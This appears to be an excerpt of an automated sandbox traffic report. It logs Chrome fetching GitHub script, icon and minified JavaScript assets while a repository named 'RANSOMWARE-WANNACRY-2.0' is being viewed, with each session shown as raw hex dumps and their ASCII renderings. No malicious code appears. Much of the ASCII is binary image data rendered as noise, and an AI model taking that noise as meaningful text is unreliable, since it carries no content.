                                                                                      2024-03-23 14:47:28 UTC728INData Raw: 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36
                                                                                      Data Ascii: -72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 35 44 31 34 0d 0a 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 2d 39 64 65 34 32 31 33 30 31 35 61 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f
                                                                                      Data Ascii: 5D14ossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js"></script><script cro
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2d 67 6c 6f 62 61 6c 2d 33 35 32 64 38 34 63 36 63 63 38 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73
                                                                                      Data Ascii: defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-352d84c6cc82.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      111192.168.2.1649817185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC660OUTGET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC624INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 14426
                                                                                      Cache-Control: public, max-age=31536000
                                                                                      Last-Modified: Mon, 16 Oct 2023 22:41:27 GMT
                                                                                      ETag: "603acd083c6e628cda0184b6b0fcef21"
                                                                                      Content-Type: image/png
                                                                                      Server: AmazonS3
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 6841982
                                                                                      X-Served-By: cache-iad-kiad7000023-IAD, cache-ewr18135-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 42, 9475
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 59d641e03797af1730f6832f15abfe57bbd5a8ce
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 06 00 00 00 e7 46 e2 b8 00 00 20 00 49 44 41 54 78 da ed 7d 77 9c 95 d5 d5 ee b3 de 29 0c 7d 06 94 12 aa 0e 20 a2 62 8c a2 51 2c b1 21 a2 b1 11 6b 30 7e 89 46 63 8c 35 c6 12 63 44 8d 0d 5b 8c 25 c4 6b 8d 3d 16 14 0b 26 11 4b ac 88 a8 14 83 0a 2a 88 30 f4 61 1a 30 cc cc 59 f7 8f 39 e7 cc 7e d7 5e 6b bf ef 19 30 df fd ee bd ef ef 37 30 73 ce 3e fb ec b2 f6 da 6b 3d ab 51 e5 a0 c1 0c 06 40 68 7d 9c df 39 fb 3b 89 d7 dd 76 cc 00 29 9f 8d 3d e2 75 b5 19 67 5f 27 bb 0d 73 eb ff 44 c6 f7 cb 0f a6 1c 8f f9 64 bf 2f a9 bf d8 b8 02 7d 71 42 9b d8 7a 5b 53 4a d1 06 0c 30 85 a7 b8 a5 c6 1c e5 17 48 2e 56 f6 83 f9 3f 49 5f d4 58 df 14 1f 5c ec 75 f6 9a c5 5e 03 39 84 61 ec 2f 51 9c 78 d4 76 a4
                                                                                      Data Ascii: PNGIHDRF IDATx}w)} bQ,!k0~Fc5cD[%k=&K*0a0Y9~^k070s>k=Q@h}9;v)=ug_'sDd/}qBz[SJ0H.V?I_X\u^9a/Qxv
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 61 0f d8 38 70 a4 68 9c 89 82 90 e0 40 05 4b 59 88 cb 40 84 c2 a4 35 0e 21 b4 ca bd 1e ea 9b 99 51 d1 a3 07 46 8f 1e 8d 23 8e 3a 12 7b 7c ff fb e8 d2 a5 0b fe 4f 7c 56 ad 5a 85 d7 a6 bf 8a 17 9e 9f 8a 0f 67 7d 88 0d 1b 36 b4 5e 73 29 14 8f 82 09 38 c5 39 86 05 59 84 da c8 db 41 e3 40 ed 19 74 92 17 85 e1 0d d2 ee 05 02 80 1d 76 dc 01 e3 8f 3d 16 63 0e 39 04 bd 7b f7 06 11 15 c4 21 90 95 53 d2 b4 2d a4 ef a4 ef 6b 69 69 c1 97 5f 7e 89 a9 cf 3e 8b a9 cf 4d c5 37 4b 96 e4 fb 4f e4 bc ed 38 e7 94 82 68 d2 10 90 db 2e af f8 6c 3b 70 30 c3 e2 78 64 dc c9 d2 aa ae 09 c1 42 c3 61 61 0d a7 50 1b 21 40 52 0c 8f 20 fc 60 ff 1f e0 a7 a7 9e 8a 5d 77 db 2d 26 cf 90 10 7a dd d7 25 c1 68 04 e4 7e 4e fb 4c 5a c2 73 09 2e 44 7c cc 8c 86 fa 7a 4c 7f e5 15 dc 7b cf bd f8
                                                                                      Data Ascii: (a8ph@KY@5!QF#:{|O|VZg}6^s)89YA@tv=c9{!S-kii_~>M7KO8h.l;p0xdBaaP!@R `]w-&z%h~NLZs.D|zL{
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 03 e2 7d db 6d be 0d 64 9b 88 b0 e7 5e 7b a2 a6 66 1d e6 ce 99 63 8a 25 9e b5 5e 49 8a a1 b9 94 68 d3 29 86 2b 5c 29 04 41 a1 90 63 ed a2 14 ec af a8 a8 08 97 5e 76 19 8e 19 3f 7e 8b 71 91 ff 9b 88 68 4b 3f c5 c5 c5 b8 f4 b2 cb 50 5f df 80 67 9e 7a 0a a4 5e 1d 50 4d 19 a4 ec b1 74 e7 20 01 2c 46 69 f5 7d 13 81 d6 84 2f e7 f7 9f 9f 71 3a 4e 9a f0 e3 2d ba 58 ff 1d 36 a9 ff 49 e3 2e 2d 2d c5 c4 ab ae c4 3e fb ee 0b b6 62 bd 09 e1 d8 77 8b eb 90 c4 81 da bd 1a 42 fd 13 3f cc 8c 71 87 1f 86 73 cf 3b 0f 51 14 a5 c2 37 d2 b6 f9 ef de b4 f6 f4 b9 25 bd 1a d3 3c 9d 3a 75 c2 cd b7 de 8a a1 c3 86 85 81 df f6 82 8c e4 00 89 32 7c 58 4d 86 c0 4a 70 9e 9b a2 24 a6 1a 32 b6 df 7e 7b 5c 73 dd 75 28 c9 9a 26 24 48 68 01 6e 21 c1 d2 52 bb 43 e0 5d d2 f7 25 f5 63 61 52 85
                                                                                      Data Ascii: }md^{fc%^Ih)+\)Ac^v?~qhK?P_gz^PMt ,Fi}/q:N-X6I.-->bwB?qs;Q7%<:u2|XMJp$2~{\su(&$Hhn!RC]%caR
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 36 25 ac 79 bb ed 86 e1 99 a9 cf a1 ac ac cc 9c 40 92 a6 e4 5e 21 2d 2d 2d 98 70 e2 49 f8 60 e6 4c 8f fa 35 c1 8f cc ac ac 8c f2 f2 72 0c 1d 36 0c 5f 7e f1 05 d6 ad 5b e7 f8 10 53 5c 60 24 df c6 93 4f 6d c7 ba 6d 48 4b 56 9e fb b7 a4 a4 18 5b f7 ea 8d 7e fd fa 61 ce ec d9 ad 57 15 c8 cb d5 ac a5 c8 63 75 ed 19 67 9c 79 26 2e ba e4 e2 20 a1 a4 0d a9 06 80 af be fa 0a 47 8c 3b 0c eb 37 6c f0 6f 96 40 72 74 19 9e 1e b9 c9 ae 41 b6 00 4d e4 2f 18 11 70 d6 39 67 a3 ac ac cc d3 64 dc 9f 24 5c c4 05 e0 9a 9a 9a b0 76 cd 9a b6 ef 14 0e 6b 96 4c 94 03 bc da da 10 6a d6 d5 e0 83 99 33 b1 76 ed da 56 38 00 94 4f 1e 45 ee 7c 0d 6d 83 14 ac 84 9c eb 85 bc 75 23 10 08 cd 4d 2d a8 5a b6 0c 1f cc 9c d9 ca e1 b2 0d 62 1e 82 a4 db 13 49 5c 67 b9 65 5a 5e 55 55 90 c0 af 69
                                                                                      Data Ascii: 6%y@^!---pI`L5r6_~[S\`$OmmHKV[~aWcugy&. G;7lo@rtAM/p9gd$\vkLj3vV8OE|mu#M-ZbI\geZ^UUi
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: fc b2 df a1 b1 b1 51 5d 43 4d 94 08 65 f6 d0 f6 aa a2 a2 02 23 47 8e 8c 73 4a 43 13 65 38 42 b4 56 16 29 56 3e 88 5b bd e2 f6 df 7f 7f 8f ca 93 88 23 6d 64 26 33 e3 ba 6b ae c5 ea d5 ab 63 19 45 59 a9 a8 e7 5a ce 89 95 cd e0 38 31 48 c0 d1 ed d3 13 bc 8d 0a 7d 60 01 b0 ba 80 2b 1b e5 91 44 ea 14 55 c9 92 05 75 0d 33 1a 40 98 f9 fe fb 78 fc d1 47 db 75 68 b5 83 af 7d 66 df fd f6 cd 9a 94 f4 31 bb 20 6d de 1a 2f 4f 26 2b 86 ca 8a 1e 15 d8 6e f8 76 aa 27 5c 08 cc d2 58 aa f6 fb 8c 77 df c3 cb d3 a6 b5 d5 8e 70 84 36 52 80 41 86 0d d4 69 9f 21 21 08 9a 39 70 c4 7a c4 84 65 03 1c 34 41 c4 04 d0 52 6b c3 64 7b 06 82 08 b7 df f6 27 ac 59 b3 a6 60 30 31 2d 08 b9 d7 e8 d1 d9 40 06 7d 7c 32 d4 27 0a c1 13 ee 33 6c d8 76 e8 62 f8 1c 6f ae 27 62 4b 4b 0b 6e ff d3 9f
                                                                                      Data Ascii: Q]CMe#GsJCe8BV)V>[#md&3kcEYZ81H}`+DUu3@xGuh}f1 m/O&+nv'\Xwp6RAi!!9pze4ARkd{'Y`01-@}|2'3lvbo'bKKn
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: c8 01 3b 93 4c 84 45 f2 1a 14 6d 38 45 1b cb 16 15 eb 47 86 1f 8b 7c 02 64 94 9e f4 72 2a 71 d8 b6 47 46 88 b4 db 2c 2a 8a d4 62 c4 9a 73 9f 55 78 c6 f2 70 2c 2a 2a f6 2c f2 5a 59 f6 62 17 ed 55 8b 70 30 bc 48 d1 cd 2d ad 9d fb bb 43 87 0e 28 2d 2d 45 53 73 b3 2e cf 90 a8 d9 6a a5 de 53 ee 2a ef 63 0c 2f ca 83 b5 48 5c 0e a8 59 2e d7 91 38 95 8c 79 cf e1 49 6e 2a 64 ad de ac 9b 09 c4 d0 7a 5c 19 29 97 31 84 19 e8 d4 b1 93 29 2e 58 84 91 d6 56 56 52 5a d2 a6 ba 93 b0 13 3a 44 14 c9 8d 23 57 26 c8 9e c8 5c 5c 76 da ab 29 0d 42 cd cc 28 eb d8 11 a5 1d 3a 98 da 90 29 d7 8b 15 26 59 1b 94 e3 c8 ba 1a 33 a6 44 6a 68 da 1e 91 ae cd 51 40 80 8f 81 80 70 bc 3b c5 78 f3 36 3b 8a 8f 99 64 9c 3d fb 91 21 04 a0 5b f7 ee a9 81 c4 42 34 64 64 f7 5c cd 14 22 94 8f 28 a6
                                                                                      Data Ascii: ;LEm8EG|dr*qGF,*bsUxp,**,ZYbUp0H-C(--ESs.jS*c/H\Y.8yIn*dz\)1).XVVRZ:D#W&\\v)B(:)&Y3DjhQ@p;x6;d=![B4dd\"(
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 9f 93 f6 25 4a f7 19 4d 56 49 fb 19 32 84 e7 34 11 db b9 d7 cf 3b ff fc bc 0b c7 e6 82 b8 da 7e 34 36 36 e2 df 0e b3 48 9a 77 a4 9e 1e 65 5c 9f cc 9b 87 c6 c6 c6 54 c9 a5 d2 48 fa 9a e0 77 ea cf 4f 43 df be 7d 7d 2e 63 80 37 9c 02 5a 66 c0 2e 51 8e 38 60 6a da 31 8c 5c 8a 41 9b 47 1a 08 bd 80 cf 30 33 f6 3f e0 00 8c de 67 ef 82 b8 4c a1 cf d2 6f be c1 ca 15 2b 52 b7 8f d4 4d 21 78 d9 23 aa 96 55 61 f1 a2 45 a6 f6 55 68 0d 52 cd 6a 5c 51 51 81 8b 2e b9 24 eb 65 67 a8 e0 f0 ad aa 6c 21 c5 1a b6 e5 c8 21 2c 6b 41 70 fc 9e 61 88 04 51 a4 23 dc da 01 64 0b b9 96 02 7b 00 19 77 fb 2e 2f 2f c7 45 97 5c dc 5a 7d 39 85 8f 4f c8 f7 c7 b2 20 00 c0 7b ef cd d0 c7 63 64 61 8b 34 4c 2e 07 2e ca 52 e0 ef bc fd 76 62 79 6c a9 e6 4b ce a4 55 4e 76 85 b8 43 0f 1b 87 23 8f
                                                                                      Data Ascii: %JMVI24;~466Hwe\THwOC}}.c7Zf.Q8`j1\AG03?gLo+RM!x#UaEUhRj\QQ.$egl!!,kApaQ#d{w.//E\Z}9O {cda4L..RvbylKUNvC#
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 2d 29 c1 d3 cf 4e c1 f6 23 46 24 26 71 cc 64 32 b8 fe da 6b f1 c0 7d f7 23 93 69 13 55 6f ba e5 16 f4 e8 d9 13 67 9e 7e 3a 4e 38 e9 24 fc e6 e2 8b d0 b1 63 c7 82 4a 45 c9 c5 5a bf 7e 3d be 58 b8 10 1f 7d f4 11 e6 ce 9e 83 05 0b 16 a0 aa aa 0a 75 b5 b5 68 6e 6e ce de f3 14 86 ad 29 41 9b d0 08 2c fb 5f 51 51 11 3a 74 e8 80 ad 7b f5 c2 80 01 03 b0 fd 88 11 f8 ee 2e df c5 88 11 3b e0 3b fd be 13 93 6d 2c 64 3e 89 08 42 6d ac b0 72 6b fd 1e 7b e4 51 5c 7e d9 65 79 ca f1 7c a0 94 84 12 b1 e5 a8 1c 38 98 03 21 db 31 d8 3a 8e 0d 31 8e 38 f2 48 dc fc c7 5b 3d 36 aa d9 bc 5a 5a 9a f1 d0 83 0f e1 b6 5b 6f 45 7d 7d 6b 0d f4 9e 3d 7b a2 ff 80 01 98 33 7b 36 a2 28 c2 01 07 1e 88 9b 6f bd 05 9d b2 85 cf d2 58 93 93 04 c9 4c 26 83 9a 9a 1a 54 af ad c6 c2 85 0b f0 87
                                                                                      Data Ascii: ,-)N#F$&qd2k}#iUog~:N8$cJEZ~=X}uhnn)A,_QQ:t{.;;m,d>Bmrk{Q\~ey|8!1:18H[=6ZZ[oE}}k={3{6(oXL&T
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 61 e3 c6 8d 9e f5 38 93 c9 a0 a1 a1 01 9f ce 9f 8f 3b 6f bf 03 87 1d 32 16 f7 dd 7b 2f 08 14 f7 6f 41 38 f3 98 95 12 cf 33 5b 18 9a 5a ae 9f 25 4b 96 14 84 d5 14 92 16 27 b4 b6 5a db 97 5e 7c 09 53 a6 4c 69 5d 0b b6 c7 4c 46 82 2c 17 27 72 3d 28 8b 19 7a 75 63 28 36 23 2d 47 b2 7c 6a 6b 6a 71 f1 85 bf c1 c3 8f 3d 8a ae d9 40 c1 34 49 00 b6 ad ac c4 5e a3 47 e3 5f af bf 91 df c4 87 1e 7c 10 af 4d 9f 9e bf 0a ba 76 ed 8a e5 cb 97 e3 e7 3f 3b 15 c5 c5 c5 18 bc cd 36 e8 b9 55 4f 14 17 17 63 c3 86 0d 58 5e b5 1c 4b be fe 1a 6b d6 ac c1 e0 6d b6 c1 9a 35 6b b2 f9 a8 29 7e 97 5b 56 0c 0e da 5c e3 b9 1a 59 07 20 dd 20 45 37 1c 3c ad 63 7b c8 0c 91 44 8c 56 bf 0b 17 2c c0 c4 2b 7e 0f 6e c9 78 59 da 18 7e 31 3b 04 d4 76 af d4 01 c9 e4 dd 8a fe a6 85 b4 c2 f4 52 23
                                                                                      Data Ascii: a8;o2{/oA83[Z%K'Z^|SLi]LF,'r=(zuc(6#-G|jkjq=@4I^G_|Mv?;6UOcX^Kkm5k)~[V\Y E7<c{DV,+~nxY~1;vR#
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 04 72 06 5a f5 d3 2d c0 49 03 a3 3c f0 31 6b 78 3d fd d4 d3 f0 ec 33 53 62 8b 5b 68 e8 73 9a f7 a2 28 f2 00 c0 58 85 43 08 90 50 03 06 a1 7b 66 4a b0 cd cb 77 88 30 78 5a c8 bc b4 b6 8d 8d 8d b8 fe da eb f0 87 ab 5a 8d d8 70 ea cd b2 b6 0f 0e 10 98 f3 3c 95 55 13 65 e8 35 2b 6b e1 b6 8b 34 c0 88 12 e0 7c c0 8e 0a e5 80 2a e8 7e cf fa 0d 1b 70 c9 45 17 e1 a6 49 37 9a 8e 63 85 14 6d 09 b2 7f e5 2e 77 4f 20 07 8c a4 2e 5c 91 a2 a0 34 2c 79 72 73 1f 09 07 ac 5e b5 0a 67 ff f2 2c dc 77 cf 3d 3e 87 0a f8 89 85 ea c7 a6 9d 97 db 4f a2 47 22 a5 e9 2d d4 1e 71 23 a6 db ae a5 a5 05 77 4f 9e 8c 33 cf 38 03 2b 14 8f c1 2d f1 44 11 05 73 10 52 e0 30 68 e1 ca e6 9c 35 a3 73 4a 35 3e 8d 81 d4 7d 7d de dc b9 38 f1 f8 e3 f1 da f4 57 83 f2 3d 25 c9 ff 94 bc f7 94 40 1f 91
                                                                                      Data Ascii: rZ-I<1kx=3Sb[hs(XCP{fJw0xZZp<Ue5+k4|*~pEI7cm.wO .\4,yrs^g,w=>OG"-q#wO38+-DsR0h5sJ5>}}8W=%@


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      112192.168.2.1649818185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC638OUTGET /assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-89fa5806aa3c.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9292
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 28 Feb 2024 05:33:44 GMT
                                                                                      ETag: 0x8DC381ED47BEAEC
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 339652
                                                                                      X-Served-By: cache-iad-kjyo7100046-IAD, cache-ewr18123-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 162, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 17dfb604c8246b0b3ced74616837165325560021
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 55 6e 64 65 72 6c 69 6e 65 4e 61 76 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 31 37 35 38 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 4a 3a 28 29 3d 3e 56 7d 29 3b 76 61 72 20 61 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 34 32 34 38 33 29 2c 72 3d 6e 28 31 35 31 37 33 29 3b 6c 65 74 20 69 3d 28 30 2c 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 29 28 7b 74 68 65 6d 65 3a 7b 7d 2c 73 65 74 43 68 69 6c
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js"],{17580:(e,t,n)=>{n.d(t,{J:()=>V});var a=n(67294),l=n(42483),r=n(15173);let i=(0,a.createContext)({theme:{},setChil
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 3a 31 2c 70 61 64 64 69 6e 67 58 3a 32 2c 70 61 64 64 69 6e 67 59 3a 22 63 61 6c 63 28 28 32 72 65 6d 20 2d 20 31 2e 32 35 72 65 6d 29 20 2f 20 32 29 22 2c 22 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 68 6f 76 65 72 29 22 3a 7b 22 26 3a 68 6f 76 65 72 20 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6c 6f 72 73 2e 6e 65 75 74 72 61 6c 2e 6d 75 74 65 64 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 62 61 63 6b 67 72 6f 75 6e 64 20 2e 31 32 73 20 65 61 73 65 2d 6f 75 74 22 2c 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 7d 7d 2c 22 26 3a 66 6f 63 75 73 22 3a 7b 6f 75 74 6c 69 6e 65 3a 22 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 22 3a 7b 62 6f 78
                                                                                      Data Ascii: :1,paddingX:2,paddingY:"calc((2rem - 1.25rem) / 2)","@media (hover:hover)":{"&:hover ":{backgroundColor:null==e?void 0:e.colors.neutral.muted,transition:"background .12s ease-out",textDecoration:"none"}},"&:focus":{outline:"2px solid transparent","&":{box
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6f 6d 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 2e 32 3b 7d 22 5d 29 2c 6a 3d 76 2e 5a 50 2e 73 70 61 6e 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 4c 6f 61 64 69 6e 67 43 6f 75 6e 74 65 72 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 6b 36 32 76 31 6c 2d 30 22 7d 29 28 5b 22 61 6e 69 6d 61 74 69 6f 6e 3a 22 2c 22 20 31 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 69 6e 66 69 6e 69 74 65 20 61 6c 74 65 72 6e 61 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 22 2c 22 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 22 2c 22 3b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 72 65 6d 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64
                                                                                      Data Ascii: om{opacity:1;}to{opacity:0.2;}"]),j=v.ZP.span.withConfig({displayName:"LoadingCounter",componentId:"sc-k62v1l-0"})(["animation:"," 1.2s ease-in-out infinite alternate;background-color:",";border-color:",";width:1.5rem;height:1rem;display:inline-block;bord
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 6e 5d 6f 66 20 65 2e 65 6e 74 72 69 65 73 28 29 29 69 66 28 28 72 3d 72 2b 6e 2e 77 69 64 74 68 2b 38 29 3e 61 29 7b 6c 3d 74 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6c 7d 2c 57 3d 28 30 2c 61 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 7b 61 73 3a 65 3d 22 6e 61 76 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 74 2c 73 78 3a 6e 3d 79 2e 50 2c 6c 6f 61 64 69 6e 67 43 6f 75 6e 74 65 72 73 3a 72 3d 21 31 2c 63 68 69 6c 64 72 65 6e 3a 64 7d 2c 75 29 3d 3e 7b 6c 65 74 20 68 3d 28 30 2c 61 2e 75 73 65 52 65 66 29 28 6e 75 6c 6c 29 2c 76 3d 6e 75 6c 6c 21 3d 75 3f 75 3a 68 2c 53 3d 28 30 2c 61 2e 75 73 65 52 65 66 29 28 6e 75 6c 6c 29 2c 4e 3d 28 30 2c 61 2e 75 73 65 52 65 66 29 28 6e 75 6c 6c 29 2c 50 3d 28 30 2c 61 2e 75 73 65 52 65 66 29 28 6e 75 6c 6c 29
